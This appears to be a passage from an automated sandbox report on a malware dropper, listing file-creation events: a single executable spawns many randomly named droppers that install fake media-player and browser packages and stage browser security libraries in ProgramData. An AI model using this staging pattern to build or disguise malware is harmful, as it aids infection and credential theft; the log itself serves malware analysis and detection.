      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeFile created: C:\Program Files (x86)\Company\NewProduct\file4.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\softokn3[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\data_load.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\libvlccore.dllJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeFile created: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\vcruntime140.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\vcruntime140[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\file2[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeFile created: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\mozglue.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BrowzarBrowser_j11[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeFile created: C:\Program Files (x86)\Company\NewProduct\Uninstall.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\jooyu[1].exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Setup2[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_h264_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\file9[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\libvlc.dllJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeFile created: C:\Program Files (x86)\Company\NewProduct\jooyu.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\file8[1].exe
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\freebl3.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeFile created: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exeJump to dropped file
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\yzhang[1].exe
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mozglue[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Users\user\AppData\Local\Temp\nsl5825.tmp\nsExec.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\libssp-0.dllJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exeFile created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\freebl3[1].dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\file5[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file3[1].bmp
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\file7[1].exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\toolspab2[1].exe
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeFile created: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\SunLabsPlayer[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\nss3.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\connection.dllJump to dropped file
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeFile created: C:\Program Files (x86)\Browzar\Uninstall.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeFile created: C:\Users\user\AppData\Local\Temp\install.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\file1[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\spu\liblogo_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\msvcp140.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\file3s[1].bmp
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeFile created: C:\Users\user\Documents\VlcpVideoV1.0.1\md8_8eus.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\softokn3.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\app[1].bmp
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Users\user\AppData\Local\Temp\nsl5825.tmp\Dialer.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\msvcp140[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nss3[2].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nss3[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Users\user\AppData\Local\Temp\nsl5825.tmp\System.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeFile created: C:\Users\user\AppData\Local\Temp\AE30.tmp
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeFile created: C:\Users\user\AppData\Local\Temp\axhub.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\mozglue.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\nss3.dll
